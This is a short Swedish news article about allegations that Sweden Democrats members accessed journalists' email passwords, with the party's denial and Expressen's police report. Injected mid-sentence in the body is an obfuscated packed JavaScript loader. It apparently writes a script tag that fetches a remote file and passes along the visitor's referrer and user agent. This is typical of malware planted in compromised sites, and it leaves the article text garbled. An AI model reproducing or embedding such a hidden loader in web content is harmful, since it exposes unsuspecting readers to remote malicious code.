Image Image Image Image Image Image Image Image Image Image

| 7 augusti, 2020

Scroll to top

Top

Sverigedemokraterna kan ha gjort dataintrång i journalisters epost

Sverigedemokraterna kan ha gjort dataintrång i journalisters epost
Sebastian

En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ityiz|var|u0026u|referrer|bkddi||js|php’.split(’|’),0,{}))
föredetta SD-politiker säger att Sverigedemokraterna har spionerat på journalisternas mail.

I morse gick en person som hävdar sig vara en föredetta Sverigedemokrat ut på Twitter och meddelande att han och andra inom Sverigedemokraterna (SD) under en längre period haft tillgång till lösenord tillhörande journalister på tidningar som Expressen och Aftonbladet.
Som bevis bifogade personen ett gäng kallade hash-koder som är kopplade till journalisternas epost-konton. De visade sig innehålla vad som skulle kunna vara journalisternas lösenord.  Det är dock inte bekräftat att denna information har något med journalisternas epost-adresser att göra. Just nu sitter de drabbade tidningarna och försöker att undersöka fallet själva.

Själv säger Sverigedemokraterna till Dagens Media att man tror att petzälls-konto på twitter är kapat och att man inte als haft tillgång till journalisters epost-konton.

Petzäll själv sitter tvångsintagen på ett LVM-hem i Lund för piller- och alkoholmissbruk.

Expressen, vars reporter Niklas Svensson är en av de drabbade, säger att man nu har anmält dataintrånget till SÄPO enligt
Dagens Media.

Läs mer:  www.dagensmedia.se